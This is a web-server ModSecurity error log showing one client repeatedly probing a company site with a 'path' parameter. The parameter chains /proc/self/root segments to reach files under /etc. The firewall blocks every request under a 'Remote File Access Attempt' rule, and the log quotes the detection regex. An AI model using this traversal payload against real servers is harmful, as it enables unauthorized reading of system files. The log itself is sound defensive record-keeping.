https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:16.499284 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.243.128:50874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwlF_V7PWP6ixUYl6PCgAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:17.853115 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.243.128:50886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwlV_V7PWP6ixUYl6PCwAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:19.194137 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:50888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwlwkwaGbbGflqUZCJ2gAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:20.543722 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.243.128:51194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwmBkFeYa1D6dYQnDB-AAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:21.931308 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:51204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwmQkwaGbbGflqUZCJ2wAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:23.343925 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:51208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwmxkFeYa1D6dYQnDB-QAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:29.313992 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:51216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwoV_V7PWP6ixUYl6PEQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:31.883472 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:36120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwo8df6f5d65gmYZRGoAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:33.327483 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:36122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwpRkFeYa1D6dYQnDB-wAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:34.791587 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:36136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwpgkwaGbbGflqUZCJ4QAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:39.786324 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:36148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwq9a6ubjKNq_cu4YWWAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:41.208829 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:59456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwrcdf6f5d65gmYZRGqAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:42.571086 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:59468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwrvu8EFLIOrSqIptx_gAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:43.857228 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:59482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwrwkwaGbbGflqUZCJ6gAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:45.247522 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.243.128:59496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwsRkFeYa1D6dYQnDB_wAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:47.593869 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.243.128:59512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwsl_V7PWP6ixUYl6PGQAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:49.215805 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:59516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwtf-YZRR_7pZ7nDJgegAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:56.009787 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:46420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwvOoXxyEfFpUF8f_kBAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:15:58.847832 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:46428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwvsdf6f5d65gmYZRGrwAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:00.235439 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:60352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwwBkFeYa1D6dYQnDCCwAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:01.615626 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:60368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwwcdf6f5d65gmYZRGswAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
